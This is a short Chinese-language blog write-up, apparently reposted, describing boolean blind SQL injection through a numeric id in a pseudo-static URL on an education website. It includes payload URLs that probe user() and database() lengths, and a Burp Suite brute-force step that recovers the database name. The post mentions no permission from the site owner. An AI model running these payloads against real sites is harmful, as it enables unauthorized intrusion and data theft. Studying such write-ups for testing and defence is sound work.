干貨！一次偽靜態頁面的SQL注入！白帽黑客實戰 

涉及技能點

• SQL注入基礎原理
• 盲注常用函數及思路
• burpsuite基礎知識

過程記錄

1.發現

在翻閱一EDU站點時，發現路徑中帶有明顯的數字參數

好像與我們平時習慣的xxx.php?id=不同呃

2.嘗試注入

按照以往習慣，先用order by探探底，結果翻車了…應該有自定義邏輯在過濾敏感關鍵詞。

繼續努力，峰回路轉,耶~~~！

構造boolen等式時能夠被帶入查詢語句并顯示不同效果

當條件不符合時，71-false=71，顯示71.html，無數據

http://EDU_SITE/.../..._id/71-false.html
=> SELECT ..FROM .. WHERE ... AND _id=71-false

而當條件符合時，71-true=70，顯示70.html，有數據

http://EDU_SITE/.../..._id/71-true.html
=> SELECT ..FROM .. WHERE ... AND _id=71-true

3.確定攻擊方式，獲取數據進行驗證

獲取用戶名長度

http://EDU_SITE/.../..._id/71-(length(user())=12).html
=> SELECT ..FROM .. WHERE ... AND _id=71-(length(user())=12)

獲取數據庫長度

http://EDU_SITE/.../..._id/71-(length(database())=6).html
=> SELECT ..FROM .. WHERE ... AND _id=71-(length(database())=6)

嘗試用burpsuite的clusterboom模式對database進行爆破

其中參數1 為位數，參數2 為可能出現的字符明文

獲得最終database()=db_cms

總結

在嘗試sql注入的時候，往往過分關注get傳參或者post傳參而忽略了URL中自帶的注入點，有時候一些明顯的數字型參數也能夠帶入payload

文章轉自公眾號：網絡安全與黑客技術